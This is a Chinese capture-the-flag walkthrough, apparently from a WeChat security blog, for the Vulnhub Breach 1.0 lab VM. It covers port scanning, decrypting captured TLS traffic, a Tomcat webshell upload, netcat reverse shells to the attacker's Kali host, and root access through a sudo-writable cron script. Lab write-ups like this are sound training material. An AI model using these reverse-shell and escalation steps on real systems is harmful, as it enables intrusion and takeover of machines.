【渗透测试】Vulnhub 1.0通关手册

  • A+
所属分类:安全文章
【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册



【渗透测试】Vulnhub 1.0通关手册


0x00 环境配置

该靶机使用了静态IP地址(192.168.110.140),我们需要配置虚拟机的网络。打开VMware,点击最上面一栏“编辑”→“虚拟网络编辑器”

【渗透测试】Vulnhub 1.0通关手册

添加一条网络,选择nat模式,子网地址192.168.110.0,子网掩码255.255.255.0,打开虚拟机的网络设置,选择自定义模式,使用刚刚配置好的nat模式的网卡。攻击机Kali也使用同样的方法配置。

【渗透测试】Vulnhub 1.0通关手册

0x01信息搜集

首先扫描靶机的IP地址

1.可以使用arp-scan

arp-scan -l

【渗透测试】Vulnhub 1.0通关手册

2.可以用nmap扫描C段

nmap 192.168.110.0/24  


【渗透测试】Vulnhub 1.0通关手册

3.可以使用fping扫描C段

fping -g 192.168.110/24

 

【渗透测试】Vulnhub 1.0通关手册

扫描服务器的端口

nmap 192.168.110.140  


【渗透测试】Vulnhub 1.0通关手册


发现开启了很多很多端口,做了端口混淆。我们可以使用隐蔽扫描

nmap 192.168.110.140 -sF  

【渗透测试】Vulnhub 1.0通关手册

扫描服务器指纹信息

nmap 192.168.110.140 -O  whatweb 192.168.110.140  

【渗透测试】Vulnhub 1.0通关手册


0x02 漏洞挖掘

访问web页面,查看源代码。发现了一处注释,是两次base64编码后的结果。

【渗透测试】Vulnhub 1.0通关手册

也可以使用命令解码

echo "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo" | base64 -d | base64 -d

 

【渗透测试】Vulnhub 1.0通关手册

查看源码发现一个页面,点进去进入到一个邮箱登录页面。用刚刚两次base64解码的账号密码登录。

【渗透测试】Vulnhub 1.0通关手册

在邮件中发现了包含ssl证书的秘钥文件

【渗透测试】Vulnhub 1.0通关手册

发现了红队攻击的流量包文件

【渗透测试】Vulnhub 1.0通关手册

发现了解密ssl证书的字符串

【渗透测试】Vulnhub 1.0通关手册

从秘钥库导出.p12证书

keytool -list -keystore keystore

导出名为admin.p12的文件

keytool -importkeystore -srckeystore keystore -destkeystore admin.p12 -deststoretype pkcs12  

【渗透测试】Vulnhub 1.0通关手册

打开wireshark进行解密

【渗透测试】Vulnhub 1.0通关手册

选择tls(旧版wireshark也叫ssl),填写靶机地址,解密证书路径,协议,端口,解密字符串

【渗透测试】Vulnhub 1.0通关手册

打开流量报文

【渗透测试】Vulnhub 1.0通关手册

即可看到解密后的流量包文,过滤出http请求,选择追踪http流

【渗透测试】Vulnhub 1.0通关手册

发现攻击者登录的路径及账号密码

【渗透测试】Vulnhub 1.0通关手册

进行base64解密

【渗透测试】Vulnhub 1.0通关手册

登陆Tomcat后台,注意:直接登陆登不进,不知道为什么,要用burpsuite进行一次代理

【渗透测试】Vulnhub 1.0通关手册

成功登陆,发现任意文件上传漏洞

【渗透测试】Vulnhub 1.0通关手册

 

 

0x03 操作系统提权

上传webshell,可以直接上传大马,然后再进行NC反弹(因为靶机有查杀webshell的工具,每隔一段时间就会清空webshell)。我这里没找到合适的大马,就用了冰蝎(加密传输,所以靶机没有杀掉webshell,为了演示,我们依旧进行nc反弹)。冰蝎依旧进行了本地代理,不然连接不上

【渗透测试】Vulnhub 1.0通关手册

反弹到kali

Kali端监听nc反弹到端口,我们用4444端口

nc -l -p 4444


冰蝎端执行反弹命令

nc -nv 192.168.110.128 -c /bin/bash  


KALI接收到反弹,我们用Python写一个交互式的shell

python -c 'import pty:;pty.spawn("/bin/bash")'


【渗透测试】Vulnhub 1.0通关手册

在网站的目录下存在着连接数据库的账号密码,数据库里包含了登录靶机的口令

【渗透测试】Vulnhub 1.0通关手册

数据库是空密码,进入数据库

mysql -u root -p  show databases;  use mysql;  show tables;  select * from users;

【渗透测试】Vulnhub 1.0通关手册

把密码进行MD5解密得到“thelaststraw”,直接登陆靶机

【渗透测试】Vulnhub 1.0通关手册

用history命令看到用户提权到blumbergh用户的记录。该用户密码保存在images目录下的图片里,可以用strings命令查看,bill.png发现了隐藏的密码

【渗透测试】Vulnhub 1.0通关手册

登录

【渗透测试】Vulnhub 1.0通关手册

发现支持以sudo权限运行的脚本

【渗透测试】Vulnhub 1.0通关手册

利用该脚本进行提权,创建一个反弹命令的TXT文件

echo"nc 192.168.110.128 4444 -e /bin/bash" >>shell.txt

kali端先开启监听

nc -l -p 4444

将该文本写入到支持sudo执行的脚本中去,从而使用root用户执行反弹命令

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh


由于该脚本2分钟执行一次,所以kali端执行命令不能第一时间接收到反馈,等等就好。生成交互式shell,拿下主机root权限

【渗透测试】Vulnhub 1.0通关手册


备注:

靶场下载地址发在我们的官方知识星球:暗魂攻防实验室(稍后会在知识星球发布百度网盘下载地址)


官方下载地址:

https://download.vulnhub.com/breach/Breach-1.0.zip





【渗透测试】Vulnhub 1.0通关手册


【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

【漏洞复现】蓝凌0A后台密码读解密(附POC)

【渗透测试】hackthebox靶场之TheNotebook

【渗透测试】hackthebox靶场之Ophiuchi

【漏洞复现】Weblogic CVE-2020-2551漏洞复现


【渗透测试】Vulnhub 1.0通关手册
【渗透测试】Vulnhub 1.0通关手册
微信搜一搜
【渗透测试】Vulnhub 1.0通关手册
暗魂攻防实验室


本文始发于微信公众号(暗魂攻防实验室):【渗透测试】Vulnhub 1.0通关手册

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: